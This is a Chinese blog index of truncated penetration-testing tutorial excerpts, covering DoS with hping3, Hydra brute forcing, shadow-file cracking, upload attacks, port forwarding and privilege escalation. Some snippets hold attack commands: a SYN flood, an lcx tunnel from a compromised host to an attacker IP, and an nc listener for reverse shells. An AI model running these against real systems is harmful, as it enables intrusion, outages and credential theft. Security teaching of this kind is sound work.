[渗透测试] VULNERABILITY SEARCHING

通过nmap得到了旗标信息,或是通过漏洞扫描器得到相应结果后,下一步工作就是查找某软件的特定版本是否存在漏洞,或者查找某个漏洞编号是否存在漏洞利用代码(EXP)。 解决这个问题有如下四个来源: 1.Searchsploit 此工具根据你提供的字符串来查找漏洞,kali中预装了此工具,但是需要定期的...

2016-05-13 14:22:13

阅读数 565

评论数 0

[渗透测试]Access数据库破解

Access数据库最早的版本是1997年推出的,后面逐渐升级为Access2000,Access2003,Access2007,Access2010等。 Access数据库以文件形式保存,文件的扩展名是.mdb。 Access数据库由6种对象组成,它们是表、查询、窗体、报表、宏和模块。 Acces...

2016-01-07 11:15:45

阅读数 906

评论数 0

[渗透测试] DOS攻击

使用hping工具,在ubuntu下的安装方法如下: sudo apt-get install hping3安装完成后的实验如下: 比如,发起攻击的机器为10.0.3.83,靶机为10.0.3.88,发起SYN Flood的命令如下 sudo hping3 --flood -S -p sudo ...

2015-11-03 09:59:04

阅读数 2056

评论数 0

[渗透测试] Wget

第一次接触到wget这个指令是在《网络安全评估》一书中的第179页: $wget -r -m -nv http://www.example.org/ 常用参数: -r,--recursive 下载整个网站、目录(小心使用) -m, --mirror 等价于 -r -N -l inf -nr. -n...

2015-10-27 10:57:54

阅读数 446

评论数 0

[渗透测试] 渗透测试板块TIPs

Radmin,监听4489端口。 旧版本的Radmin在安装的时候是把密码写入注册表的,HKEY_LOCAL_MACHINE\SYSTEM\RAdmin\v2.0\Server\Parameters

2015-10-20 13:39:53

阅读数 381

评论数 0

[渗透测试] 工具简介

1.漏洞扫描类: JSky:中文名字为竭思,是深圳市宇造诺赛科技有限公司的产品是一款简明易用的Web漏洞扫描软件。 WebCruiser:一个小巧但功能不凡的Web应用漏洞扫描器。 WATScan:中文名叫真眼,是一款在线Web漏洞扫描系统。 2.SQL相关类: Havij:一款自动化的SQL注...

2015-09-24 14:31:54

阅读数 1551

评论数 0

[渗透测试] 渗透测试中的上传攻击技巧

1.FCKeditor FCKeditor是一个专门用在网页上的,开放源代码的所见即所得文字编辑器,不需要太复杂的安装步骤即可使用。它可以和PHP、JavaScript、ASP、ASP.NET、ColdFusion、Java及ABAP等编程语言相结合。 在早期版本中输入地址“fckeditor/e...

2015-09-24 10:54:09

阅读数 1162

评论数 0

[渗透测试] john the ripper

安装过程如下 安装后查看软件都有哪些操作指令 接下来查看系统的影子文件 将文件中的内容复制到crackme.txt中 vi crackme.txt,将内容粘贴,最后:wq!保存 利用john破解,得到结果

2015-09-10 23:21:25

阅读数 252

评论数 0

[渗透测试] DNS

域名服务器使用两个端口来响应外来的请求:UDP 53端口,用于处理标准的直接请求(如将名字解析到IP地址,或者相反);TCP 53端口,用于在区域传送或其他高流量查询时提供DNS信息。

2015-08-25 14:38:21

阅读数 1026

评论数 0

[渗透测试] ARP欺骗攻击&DNS欺骗攻击

ARP是Address Resolution Protocol的缩写。其基本功能就是在主机发送数据之前将目标IP转换为MAC地址,完成网络地址到物理地理地址的映射,以保证两台主机能够正常通信。 任何一台主机安装了TCP/IP协议都会有ARP缓存表,该表保存了这个网络(局域网)中各主机IP对应的MA...

2015-08-01 19:50:52

阅读数 4552

评论数 0

[渗透测试] Google Hack

搜索子域名:site:baidu.com 常用语法: site:指定域名 intext:正文中存在关键字的网页 intitle:标题中存在关键字的网页 info:一些基本信息 inurl:URL存在关键字的网页 filetype:搜索指定文件类型 案例一:搜索存在敏感信息的网站 输入“intit...

2015-07-17 17:30:20

阅读数 1224

评论数 0

[渗透测试] Hydra暴力破解

暴力破解也被称为枚举测试、穷举法测试,是一种针对密码破译的方法,即:将密码逐个比较,直到找出真正的密码为止。 一、C/S架构破解 C/S架构即大家熟知的客户端和服务器架构,这里以SQL Server与MySQL数据库为例。 数据库一般会提供一个默认的帐户,SQL Server的sa用户,MySQ...

2015-07-14 13:13:55

阅读数 12600

评论数 0

[渗透测试] 旁注攻击

旁注攻击即攻击者在攻击目标时,对目标网站“无从下手”,找不到漏洞时,攻击者就可能会通过具有同一服务器的网站渗透到目标网站,从而获取目标网站的权限。这一过程就是旁注攻击的过程。 攻击者在进行旁注操作时,一般都会与提权技术结合在一起,旁注与提权是密不可分的。 一、服务器端Web架构 旁注攻击多数放生...

2015-07-13 17:35:37

阅读数 2707

评论数 0

[渗透测试] 端口转发

如果服务器在内网中,一般情况下攻击者无法连接,但是如果其拥有服务器权限后,就可以使用端口转发技术。 一、LCX转发 首先在攻击者自己的机器上执行如下命令: lcx -listen 500 8888 随后在被攻击的计算机上执行以下命令: lcx.exe -slave [攻击者IP] 500 127...

2015-07-12 15:04:22

阅读数 840

评论数 0

[渗透测试] PcAnywhere提权

PcAnywhere是一款远程控制软件,PcAnywhere的出现是为了方便网管人员管理服务器。安装之后默认监听“5631端口”。 PcAnywhere提权主要是为了PcAnywhere的一个特点,那就是建立被控端后,会在服务器上产生一个配置文件“PCA.*.CIF”,这个文件所在的目录并非在安...

2015-07-11 21:34:32

阅读数 1230

评论数 0

[渗透测试] 系统提权

一、查看服务器内核版本 针对不同的内核版本找寻对应的本地溢出程序。 执行id & uname -a,查看当前用户的ID、所属群组的ID,以及内核版本号。 二、本地接收服务器端数据 使用NC监听本地端口“8888”,等待服务器端反向连接。 nc -l -n -v -p 8888 注:攻击者...

2015-07-10 10:55:08

阅读数 1204

评论数 0

[渗透测试] 端口扫描

端口就是一个潜在的通信通道,也就是一个入侵通道。它使系统用户了解系统目前向外界提供了哪些服务。 为区别通信的程序,在所有IP数据报文中不仅有源地址和目的地址,而且也有源端口号与目的端口号。 特定端口被指定用于特定的服务,而地址和端口一起组成一个套接字地址,在网络上唯一标识该服务。 端口号在0~10...

2015-06-01 16:26:08

阅读数 1816

评论数 0

[渗透测试] MySQL

MySQL通常运行在Linux、FreeBSD服务器的TCP3306端口。 一、MySQL枚举 $telnet 10.0.0.8 3306 Trying 10.0.0.8... Connected to 10.0.0.8. Escape character is '^]'. ( 3.23.52...

2015-05-28 17:05:55

阅读数 1893

评论数 0

[渗透测试] Microsoft SQL Server

ms-sql           1433/tcp ms-sql-ssrs      1434/udp ms-sql-hidden    2433/tcp 一、Microsoft SQL Server进行交互 Microsoft SQL Server可以使用如下的传输协议: TCP/IP(TC...

2015-05-28 16:12:40

阅读数 1750

评论数 0

[渗透测试] SSH

安全shell(SSH)服务提供了对Unix和Windows系统的加密访问,通过SSH可以进行命令行shell访问、文件访问与安全FTP、以及简单的VPN服务。 由于使用明文的服务(如Telnet)存在的弱点经常会被攻击者利用来突破网络,所以SSH应运而生,主要用于实现对服务器的加密访问,以达到安...

2015-05-23 15:06:37

阅读数 1744

评论数 0

提示
确定要删除当前文章?
取消 删除
关闭
关闭